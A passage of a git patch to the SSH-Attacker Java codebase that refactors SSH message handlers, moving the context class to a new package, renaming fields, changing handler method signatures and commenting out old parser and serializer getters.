.../protocol/common/layer/MessageLayer.java | 0 .../handler/ExtensionInfoMessageHandler.java | 24 +++++------ .../KeyExchangeInitMessageHandler.java | 41 +++++++++++-------- .../handler/NewCompressMessageHandler.java | 39 +++++++++--------- .../handler/NewKeysMessageHandler.java | 8 ++-- .../transport/handler/PingMessageHandler.java | 15 +++---- .../transport/handler/PongMessageHandler.java | 15 +++---- .../extension/AbstractExtensionHandler.java | 2 +- .../DelayCompressionExtensionHandler.java | 2 +- .../extension/PingExtensionHandler.java | 2 +- .../ServerSigAlgsExtensionHandler.java | 2 +- .../extension/UnknownExtensionHandler.java | 2 +- .../message/ExtensionInfoMessage.java | 23 ++++++++++- .../transport/message/NewCompressMessage.java | 23 ++++++++++- .../transport/message/PingMessage.java | 23 ++++++++++- .../transport/message/PongMessage.java | 23 ++++++++++- .../message/extension/AbstractExtension.java | 2 +- .../extension/DelayCompressionExtension.java | 2 +- .../message/extension/PingExtension.java | 2 +- .../extension/ServerSigAlgsExtension.java | 2 +- .../message/extension/UnknownExtension.java | 2 +- .../parser/ExtensionInfoMessageParser.java | 36 +++++++++------- .../parser/NewCompressMessageParser.java | 16 +++++--- .../transport/parser/PingMessageParser.java | 26 ++++++++---- .../transport/parser/PongMessageParser.java | 26 ++++++++---- ...DhGexKeyExchangeInitMessagePreparator.java | 3 +- .../DisconnectMessagePreparator.java | 2 +- .../EcdhKeyExchangeInitMessagePreparator.java | 2 +- .../ExtensionInfoMessagePreparator.java | 4 +- ...ybridKeyExchangeInitMessagePreperator.java | 8 ++-- ...bridKeyExchangeReplyMessagePreparator.java | 2 +- .../DelayCompressionExtensionPreparator.java | 6 +-- .../extension/PingExtensionPreparator.java | 2 +- .../ServerSigAlgsExtensionPreparator.java | 2 +- .../rub/nds/sshattacker/core/state/State.java | 28 ------------- .../workflow/DefaultWorkflowExecutor.java | 1 - .../core/workflow/WorkflowExecutor.java | 1 - .../workflow/WorkflowExecutorRunnable.java | 4 +- .../core/workflow/WorkflowTrace.java | 2 +- .../workflow/WorkflowTraceNormalizer.java | 2 +- .../core/workflow/WorkflowTraceUtil.java | 16 -------- .../action/DynamicDelayCompressionAction.java | 2 +- .../DynamicExtensionNegotiationAction.java | 2 +- .../action/DynamicKeyExchangeAction.java | 12 +----- .../action/ForwardMessagesAction.java | 5 --- .../core/workflow/action/ReceiveAction.java | 8 ++-- .../core/workflow/action/ReceivingAction.java | 3 -- .../core/workflow/action/SshAction.java | 2 + .../action/executor/ReceiveMessageHelper.java | 0 .../action/executor/SendMessageHelper.java | 0 .../core/workflow/chooser/DefaultChooser.java | 23 +++++++---- .../ExtensionInfoMessageParserTest.java | 7 +++- 62 files changed, 306 insertions(+), 254 deletions(-) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerParseResult.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index f3286acf7..8699b3467 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -13,7 +13,6 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.attacks.config.BleichenbacherCommandConfig; import de.rub.nds.sshattacker.attacks.general.KeyFetcher; -import de.rub.nds.sshattacker.attacks.general.ParallelExecutor; import de.rub.nds.sshattacker.attacks.pkcs1.*; import de.rub.nds.sshattacker.attacks.pkcs1.oracles.BleichenbacherOracle; import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Pkcs1Oracle; @@ -30,6 +29,7 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.DefaultWorkflowExecutor; +import de.rub.nds.sshattacker.core.workflow.ParallelExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; import de.rub.nds.sshattacker.core.workflow.action.GenericReceiveAction; diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java index df4517a82..0e91be3e6 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java @@ -94,7 +94,7 @@ private boolean[] oracleStrong(byte[] msg) { timeElapsedforAverageCalculation = 0; } - if (isPlaintextOracle) { + if (isPlaintextOracle()) { return new boolean[] {true, true}; } else { long start = System.currentTimeMillis(); @@ -158,7 +158,7 @@ private boolean[] oracleWeak(byte[] msg) { } long start = System.currentTimeMillis(); - if (isPlaintextOracle) { + if (isPlaintextOracle()) { return new boolean[] {true, true}; } else { try { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 93c5adf9f..7868c8058 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -442,6 +442,10 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { private List outputFilters; /** The path to save the workflow trace as output */ private String workflowOutput = null; + + /** Defines the type of WorkflowExecutor to use when executing the workflow. */ + private WorkflowExecutorType workflowExecutorType = WorkflowExecutorType.DEFAULT; + /** * Defines if the output filters should be applied on the workflowTrace or on a fresh workflow * trace copy. @@ -466,7 +470,6 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { * Setting this to true results in the client transport handlers trying to acquire a new port on * each connection attempt. Default behavior true so that reused ports are not an issue. */ - private Boolean resetClientSourcePort = true; /** * Setting this to true results in multiple attempts to initialize a connection to the server * when a ClientTcpTransportHandler is used. @@ -2195,10 +2198,6 @@ public void setResetWorkflowtracesBeforeSaving(Boolean resetWorkflowtracesBefore this.resetWorkflowtracesBeforeSaving = resetWorkflowtracesBeforeSaving; } - public void setResetClientSourcePort(Boolean resetClientSourcePort) { - this.resetClientSourcePort = resetClientSourcePort; - } - public void setRetryFailedClientTcpSocketInitialization( Boolean retryFailedClientTcpSocketInitialization) { this.retryFailedClientTcpSocketInitialization = retryFailedClientTcpSocketInitialization; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java index 19dba7c5e..9a1c5e07b 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java @@ -22,10 +22,6 @@ public WorkflowExecutionException(String message, Throwable cause) { super(message, cause); } - public WorkflowExecutionException(Throwable cause) { - super(cause); - } - public WorkflowExecutionException(Throwable throwable) { super(throwable); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index a7c1016f2..7e8372e3f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -25,8 +25,8 @@ import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; import de.rub.nds.sshattacker.core.protocol.connection.Channel; import de.rub.nds.sshattacker.core.protocol.connection.ChannelManager; -import de.rub.nds.sshattacker.core.state.Context; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.AbstractExtension; +import de.rub.nds.sshattacker.core.state.Context; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import de.rub.nds.sshattacker.core.workflow.chooser.ChooserFactory; import de.rub.nds.tlsattacker.transport.ConnectionEndType; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java index c735c0da0..3de15a429 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java @@ -118,7 +118,7 @@ public CipherMode getMode() { } public Boolean isEncryptThenMac() { - return macAlgorithm != null && macAlgorithm.isEncryptThenMacAlgorithm(); + return macAlgorithm != null && macAlgorithm.isEncryptThenMac(); } protected ConnectionEndType getLocalConnectionEndType() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java deleted file mode 100644 index e69de29bb..000000000 diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java deleted file mode 100644 index e69de29bb..000000000 diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerParseResult.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerParseResult.java deleted file mode 100644 index e69de29bb..000000000 diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java index 7837beae7..28094a829 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java @@ -34,14 +34,15 @@ public void adjustContext(UserAuthSuccessMessage message) { public void adjustContextAfterMessageSent() { // Enable delayed compression if negotiated activateCompression(); - if (!context.isClient() - && context.delayCompressionExtensionReceived() - && context.getConfig().getRespectDelayCompressionExtension() - && !context.getDelayCompressionExtensionNegotiationFailed() - && context.getSelectedDelayCompressionMethod().isPresent()) { - context.getPacketLayer() + if (!sshContext.isClient() + && sshContext.delayCompressionExtensionReceived() + && sshContext.getConfig().getRespectDelayCompressionExtension() + && !sshContext.getDelayCompressionExtensionNegotiationFailed() + && sshContext.getSelectedDelayCompressionMethod().isPresent()) { + sshContext + .getPacketLayer() .updateCompressionAlgorithm( - context.getSelectedDelayCompressionMethod().get().getAlgorithm()); + sshContext.getSelectedDelayCompressionMethod().get().getAlgorithm()); } } @@ -61,14 +62,15 @@ private void activateCompression() { } // receiving UserAuthSuccessMessage when acting as client // --> set new compression algorithm from delay-compression extension - if (context.isHandleAsClient() - && context.getConfig().getRespectDelayCompressionExtension() - && context.delayCompressionExtensionReceived() - && !context.getDelayCompressionExtensionNegotiationFailed() - && context.getSelectedDelayCompressionMethod().isPresent()) { - context.getPacketLayer() + if (sshContext.isHandleAsClient() + && sshContext.getConfig().getRespectDelayCompressionExtension() + && sshContext.delayCompressionExtensionReceived() + && !sshContext.getDelayCompressionExtensionNegotiationFailed() + && sshContext.getSelectedDelayCompressionMethod().isPresent()) { + sshContext + .getPacketLayer() .updateDecompressionAlgorithm( - context.getSelectedDelayCompressionMethod().get().getAlgorithm()); + sshContext.getSelectedDelayCompressionMethod().get().getAlgorithm()); } // receiving UserAuthSuccessMessage when acting as server else { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java deleted file mode 100644 index e69de29bb..000000000 diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ExtensionInfoMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ExtensionInfoMessageHandler.java index 63c6d8311..84057b63e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ExtensionInfoMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ExtensionInfoMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.transport.message.ExtensionInfoMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.ExtensionInfoMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.ExtensionInfoMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.ExtensionInfoMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ExtensionInfoMessageHandler extends SshMessageHandler { @@ -20,21 +17,22 @@ public ExtensionInfoMessageHandler(SshContext context) { super(context); } - public ExtensionInfoMessageHandler(SshContext context, ExtensionInfoMessage message) { + /*public ExtensionInfoMessageHandler(SshContext context, ExtensionInfoMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { - if (context.isHandleAsClient()) { - context.setServerSupportedExtensions(message.getExtensions()); + public void adjustContext(ExtensionInfoMessage message) { + if (sshContext.isHandleAsClient()) { + sshContext.setServerSupportedExtensions(message.getExtensions()); } else { - context.setClientSupportedExtensions(message.getExtensions()); + sshContext.setClientSupportedExtensions(message.getExtensions()); } - message.getExtensions().forEach(extension -> extension.getHandler(context).adjustContext()); + message.getExtensions() + .forEach(extension -> extension.getHandler(sshContext).adjustContext()); } - @Override + /* @Override public ExtensionInfoMessageParser getParser(byte[] array) { return new ExtensionInfoMessageParser(array); } @@ -52,5 +50,5 @@ public ExtensionInfoMessagePreparator getPreparator() { @Override public ExtensionInfoMessageSerializer getSerializer() { return new ExtensionInfoMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java index 2ea595637..d1592cba4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java @@ -73,6 +73,20 @@ public void adjustContextAfterMessageSent(KeyExchangeInitMessage message) { .split("" + CharConstants.ALGORITHM_SEPARATOR))); sshContext.setServerReserved(message.getReserved().getValue()); + sshContext.setServerSupportsExtensionNegotiation( + checkServerSupportForExtensionNegotiation()); + sshContext.setStrictKeyExchangeEnabled( + containsKeyExchangeAlgorithm( + KeyExchangeAlgorithm.KEX_STRICT_S_V00_OPENSSH_COM, + sshContext + .getServerSupportedKeyExchangeAlgorithms() + .orElse(List.of())) + && containsKeyExchangeAlgorithm( + KeyExchangeAlgorithm.KEX_STRICT_C_V00_OPENSSH_COM, + sshContext + .getConfig() + .getClientSupportedKeyExchangeAlgorithms())); + // sshContext.getExchangeHashInputHolder().setClientKeyExchangeInit(message); } else { sshContext.setClientCookie(message.getCookie().getValue()); @@ -174,16 +188,6 @@ public void adjustContext(KeyExchangeInitMessage message) { sshContext.setServerReserved(message.getReserved().getValue()); sshContext.getExchangeHashInputHolder().setServerKeyExchangeInit(message); - sshContext.setServerSupportsExtensionNegotiation( - checkServerSupportForExtensionNegotiation()); - sshContext.setStrictKeyExchangeEnabled( - containsKeyExchangeAlgorithm( - KeyExchangeAlgorithm.KEX_STRICT_S_V00_OPENSSH_COM, - context.getServerSupportedKeyExchangeAlgorithms() - .orElse(List.of())) - && containsKeyExchangeAlgorithm( - KeyExchangeAlgorithm.KEX_STRICT_C_V00_OPENSSH_COM, - context.getConfig().getClientSupportedKeyExchangeAlgorithms())); } else { LOGGER.info("Client_Coookie is: {}", message.getCookie()); @@ -233,32 +237,35 @@ && containsKeyExchangeAlgorithm( sshContext.setClientReserved(message.getReserved().getValue()); sshContext.getExchangeHashInputHolder().setClientKeyExchangeInit(message); - } - context.setClientSupportsExtensionNegotiation( + sshContext.setClientSupportsExtensionNegotiation( checkClientSupportForExtensionNegotiation()); - context.setStrictKeyExchangeEnabled( + sshContext.setStrictKeyExchangeEnabled( containsKeyExchangeAlgorithm( KeyExchangeAlgorithm.KEX_STRICT_C_V00_OPENSSH_COM, - context.getClientSupportedKeyExchangeAlgorithms() + sshContext + .getClientSupportedKeyExchangeAlgorithms() .orElse(List.of())) && containsKeyExchangeAlgorithm( KeyExchangeAlgorithm.KEX_STRICT_S_V00_OPENSSH_COM, - context.getConfig().getServerSupportedKeyExchangeAlgorithms())); + sshContext + .getConfig() + .getServerSupportedKeyExchangeAlgorithms())); } + pickAlgorithms(); } private boolean checkClientSupportForExtensionNegotiation() { return containsKeyExchangeAlgorithm( KeyExchangeAlgorithm.EXT_INFO_C, - context.getClientSupportedKeyExchangeAlgorithms().orElse(List.of())); + sshContext.getClientSupportedKeyExchangeAlgorithms().orElse(List.of())); } private boolean checkServerSupportForExtensionNegotiation() { return containsKeyExchangeAlgorithm( KeyExchangeAlgorithm.EXT_INFO_S, - context.getServerSupportedKeyExchangeAlgorithms().orElse(List.of())); + sshContext.getServerSupportedKeyExchangeAlgorithms().orElse(List.of())); } private static boolean containsKeyExchangeAlgorithm( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewCompressMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewCompressMessageHandler.java index 4ffc779e6..7c44e67e8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewCompressMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewCompressMessageHandler.java @@ -8,13 +8,10 @@ package de.rub.nds.sshattacker.core.protocol.transport.handler; import de.rub.nds.sshattacker.core.constants.CompressionMethod; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.MessageSentHandler; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.transport.message.NewCompressMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.NewCompressMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.NewCompressMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.NewCompressMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class NewCompressMessageHandler extends SshMessageHandler implements MessageSentHandler { @@ -23,25 +20,27 @@ public NewCompressMessageHandler(SshContext context) { super(context); } - public NewCompressMessageHandler(SshContext context, NewCompressMessage message) { + /*public NewCompressMessageHandler(SshContext context, NewCompressMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(NewCompressMessage message) { // receiving NewCompressMessage when acting as server -> update compression algorithm - if (!context.isHandleAsClient() - && context.delayCompressionExtensionReceived() - && context.getConfig().getRespectDelayCompressionExtension()) { - context.getPacketLayer() + if (!sshContext.isHandleAsClient() + && sshContext.delayCompressionExtensionReceived() + && sshContext.getConfig().getRespectDelayCompressionExtension()) { + sshContext + .getPacketLayer() .updateDecompressionAlgorithm( - context.getSelectedDelayCompressionMethod() + sshContext + .getSelectedDelayCompressionMethod() .orElse(CompressionMethod.NONE) .getAlgorithm()); } } - @Override + /*@Override public NewCompressMessageParser getParser(byte[] array) { return new NewCompressMessageParser(array); } @@ -59,16 +58,18 @@ public NewCompressMessagePreparator getPreparator() { @Override public NewCompressMessageSerializer getSerializer() { return new NewCompressMessageSerializer(message); - } + }*/ @Override public void adjustContextAfterMessageSent() { - if (context.isClient() - && context.delayCompressionExtensionReceived() - && context.getConfig().getRespectDelayCompressionExtension()) { - context.getPacketLayer() + if (sshContext.isClient() + && sshContext.delayCompressionExtensionReceived() + && sshContext.getConfig().getRespectDelayCompressionExtension()) { + sshContext + .getPacketLayer() .updateCompressionAlgorithm( - context.getSelectedDelayCompressionMethod() + sshContext + .getSelectedDelayCompressionMethod() .orElse(CompressionMethod.NONE) .getAlgorithm()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java index a34b055cc..62a68cf1b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java @@ -33,9 +33,9 @@ public NewKeysMessageHandler(SshContext context) { public void adjustContext(NewKeysMessage message) { if (sshContext.getConfig().getEnableEncryptionOnNewKeysMessage()) { adjustEncryptionForDirection(true); - if (context.getStrictKeyExchangeEnabled().orElse(false)) { + if (sshContext.getStrictKeyExchangeEnabled().orElse(false)) { LOGGER.info("Resetting read sequence number to 0 because of strict key exchange"); - context.setReadSequenceNumber(0); + sshContext.setReadSequenceNumber(0); } } adjustCompressionForDirection(true); @@ -45,9 +45,9 @@ public void adjustContext(NewKeysMessage message) { public void adjustContextAfterMessageSent() { if (sshContext.getConfig().getEnableEncryptionOnNewKeysMessage()) { adjustEncryptionForDirection(false); - if (context.getStrictKeyExchangeEnabled().orElse(false)) { + if (sshContext.getStrictKeyExchangeEnabled().orElse(false)) { LOGGER.info("Resetting write sequence number to 0 because of strict key exchange"); - context.setWriteSequenceNumber(0); + sshContext.setWriteSequenceNumber(0); } } adjustCompressionForDirection(false); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/PingMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/PingMessageHandler.java index aa53c2d9c..5c79301c4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/PingMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/PingMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.transport.message.PingMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.PingMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.PingMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.PingMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -24,18 +21,18 @@ public PingMessageHandler(SshContext context) { super(context); } - public PingMessageHandler(SshContext context, PingMessage message) { + /* public PingMessageHandler(SshContext context, PingMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(PingMessage message) { LOGGER.debug( "PingMessage received from remote, data to respond length: {}", message.getDataLength().getValue()); } - @Override + /* @Override public PingMessageParser getParser(byte[] array) { return new PingMessageParser(array); } @@ -53,5 +50,5 @@ public PingMessagePreparator getPreparator() { @Override public PingMessageSerializer getSerializer() { return new PingMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/PongMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/PongMessageHandler.java index 958e81937..0be36919b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/PongMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/PongMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.transport.message.PongMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.PongMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.PongMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.PongMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -24,18 +21,18 @@ public PongMessageHandler(SshContext context) { super(context); } - public PongMessageHandler(SshContext context, PongMessage message) { + /* public PongMessageHandler(SshContext context, PongMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(PongMessage message) { LOGGER.debug( "PongMessage received from remote, responded data length: {}", message.getDataLength().getValue()); } - @Override + /* @Override public PongMessageParser getParser(byte[] array) { return new PongMessageParser(array); } @@ -53,5 +50,5 @@ public PongMessagePreparator getPreparator() { @Override public PongMessageSerializer getSerializer() { return new PongMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/AbstractExtensionHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/AbstractExtensionHandler.java index 1897e98a5..784ace46a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/AbstractExtensionHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/AbstractExtensionHandler.java @@ -7,9 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler.extension; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.Handler; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.AbstractExtension; -import de.rub.nds.sshattacker.core.state.SshContext; public abstract class AbstractExtensionHandler> implements Handler { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/DelayCompressionExtensionHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/DelayCompressionExtensionHandler.java index 9e5b9cec9..28af516dc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/DelayCompressionExtensionHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/DelayCompressionExtensionHandler.java @@ -8,12 +8,12 @@ package de.rub.nds.sshattacker.core.protocol.transport.handler.extension; import de.rub.nds.sshattacker.core.constants.CompressionMethod; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.DelayCompressionExtension; import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.DelayCompressionExtensionParser; import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.DelayCompressionExtensionPreparator; import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.DelayCompressionExtensionSerializer; import de.rub.nds.sshattacker.core.protocol.util.AlgorithmPicker; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import java.util.List; import java.util.Optional; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/PingExtensionHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/PingExtensionHandler.java index 958501e0b..4cb68573c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/PingExtensionHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/PingExtensionHandler.java @@ -7,11 +7,11 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler.extension; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.PingExtension; import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.PingExtensionParser; import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.PingExtensionPreparator; import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.PingExtensionSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/ServerSigAlgsExtensionHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/ServerSigAlgsExtensionHandler.java index 7fd272caf..8bcb31aa1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/ServerSigAlgsExtensionHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/ServerSigAlgsExtensionHandler.java @@ -8,11 +8,11 @@ package 